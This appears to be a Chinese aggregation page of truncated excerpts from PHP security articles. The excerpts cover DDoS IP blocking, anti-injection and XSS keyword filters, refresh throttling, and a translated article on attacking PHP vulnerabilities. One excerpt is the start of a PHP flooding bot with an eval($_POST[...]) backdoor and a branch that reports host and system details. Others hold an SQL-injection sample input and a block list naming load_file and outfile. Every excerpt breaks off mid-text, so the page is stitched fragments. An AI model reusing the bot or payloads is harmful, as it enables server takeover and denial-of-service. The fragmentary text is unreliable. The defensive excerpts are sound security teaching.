/*** 防止ddos、dns、集群等攻击* edit bbs.it-home.org*///查询禁止IP$ip =$_SERVER['REMOTE_ADDR'];$fileht=".htaccess2";if(!file_exists($fileht))file_put_contents($fileht,"");$filehtarr=@file($fileht);if(in_array($ip."\r\n",$filehtarr))die("Warning:".""."Your IP address are forbided by some reason, IF you have any question Pls emill to shop@jbxue.com!");//加入禁止IP$time=time();$fileforbid="log/forbid...
//防注入函数function inject_check($sql_str){ $check = eregi('select|insert|update|delete|\*|\/\*|\'|\.\.\/|\.\/|UNION|into|load_file|outfile',$sql_str); if($check){ page_href("http://".$_SERVER['HTTP_HOST']."/home/sitemap.php"); exit(); }else{ return $sql_str; }}//防跨站攻击function inject_check2($sql_str){ $check = eregi('javascript|vbscript|expression|applet|meta|xml|blink...
本文介绍下,在php编程中,用于防止ddos攻击的一个简单方法,有需要的朋友参考下。我们知道拒绝服务攻击,即DDOS攻击会导致带宽被占用,让正常用户无法访问网站。 这里提供一个简单的参考方法,修改php.ini文件 1) "disable_functions"改成gzinflate,默认是放空 2) ”allow_url_fopen“设为Off 3) php_sockets.dll 把这个模块打开 重启使配置生效,一般可以抵御掉DDOS攻击。更完善些的预防方法,可以参考文章: php下ddos攻击与防...
eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_GET['rat']){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; ex...
<?php$P_S_T = $t_array[0] + $t_array[1]; $timestamp = time();session_start(); $ll_nowtime = $timestamp ; if (session_is_registered(ll_lasttime)){ $ll_lasttime = $_SESSION[ll_lasttime]; $ll_times = $_SESSION[ll_times] + 1; $_SESSION[ll_times] = $ll_times; }else{ $ll_lasttime = $ll_nowtime; $ll_times = 1; $_SESSION[ll_times] = $ll_times; $_SESSION[ll_lasttime] = $ll_lasttime; } if (($ll_nowtime - $l...
//代理IP直接退出empty($_SERVER['HTTP_VIA']) or exit('Access Denied');//防止快速刷新session_start();$seconds = '3'; //时间段[秒]$refresh = '5'; //刷新次数//设置监控变量$cur_time = time();if(isset($_SESSION['last_time'])){ $_SESSION['refresh_times'] += 1;}else{ $_SESSION['refresh_times'] = 1; $_SESSION['last_time'] = $cur_time;}//处理监控结果if($cur_time - $_SESSION['last_time'] if($_SESSION['refre...
作为一个攻击者,他会从推测验证用户名和密码的查询sql语句开始。 通过查看源文件,他就能开始猜测你的习惯。 比如命名习惯。 通常会假设你表单中的字段名为与数据表中的字段名相同。 当然,确保它们不同未必是一个可靠的安全措施。
// supposed input $name = "ilia; DELETE FROM users;"; mysql_query("SELECT * FROM users WHERE name={$name}");很明显最后数据库执行的命令是: SELECT * FROM users WHERE name=ilia; DELETE FROM users这就给数据库带来了灾难性的后果–所有记录都被删除了。 不过如果使用的数据库是MySQL,那么还好,mysql_query()函数不允许直接执行这样的操作(不能单行进行多个语句操作),所以你可以放心。 如果使用的数据库是SQLite或者...
该function用来统计每个来访者在短时间内共访问了多少次,如果超出了次数限制,则返回TRUE,之后您可以用PHP调用linux的iptables进行封锁操作就行了我曾用过几个DDOS类的工具实际测试过,效果很不错.对了,顺便提一下,我在代码中用文件来记录来访者ip和时间,最好是别用数据库(也不要自作聪明地存入session中),另外最好是把这个文件放入SSD硬盘上,原因嘛我就不说了,估计大家都知道/** 防止客戶端惡意重整 用法: $isf5=Fun::isf5(); 返回...
来源:Chinaasp 之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http://www.securereality.com.au/stu...arlet.txt找到。 由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。 文章主...
如何对PHP程序中的常见漏洞进行攻击(上) 翻译:analysist(分析家) 来源:http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击(上) 原著:Shaun Clowes 翻译:analysist 之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http://www.securereality.com.au/studyinscarlet.t...
如何对PHP程序中的常见漏洞进行攻击(下) 翻译:analysist(分析家) 来源:http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击(下) 原著:Shaun Clowes 翻译:analysist [库文件] 正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以...
之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http: //www.securereality.com.au/studyinscarlet.txt找到。 由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。 文章主要从全局...
其实这个话题很早就想说说了,发现国内不少PHP站点都有XSS漏洞。今天偶然看到PHP5的一个XSS漏洞,在此小结一下。顺便提醒,使用PHP5的朋友最好打下补丁,或者升级一下。 如果你不懂什么是XSS,可以看这里,或者这里(中文的也许会好懂一些)。 国内不少论坛都存在跨站脚本漏洞,例如这里 有一个Google Hack+XSS的攻击例子,针对的是Discuz 4.0.0RC3。国外也很多这样的例子,甚至Google也出现过,不过在12月初时修正了。跨站攻击很...
Haohappy http://blog.csdn.net/Haohappy2004 SQL注入攻击是黑客攻击网站最常用的手段。如果你的站点没有使用严格的用户输入检验,那么非常容易遭到SQL注入攻击。SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实现,很可能使数据库中的纪录遭到暴露,更改或被删除。下面来谈谈SQL注入攻击是如何实现的,又如何防范。 看这个例子: // supposed input $name = “ilia'; DELETE FROM users;”; mysql_query(“SELECT *...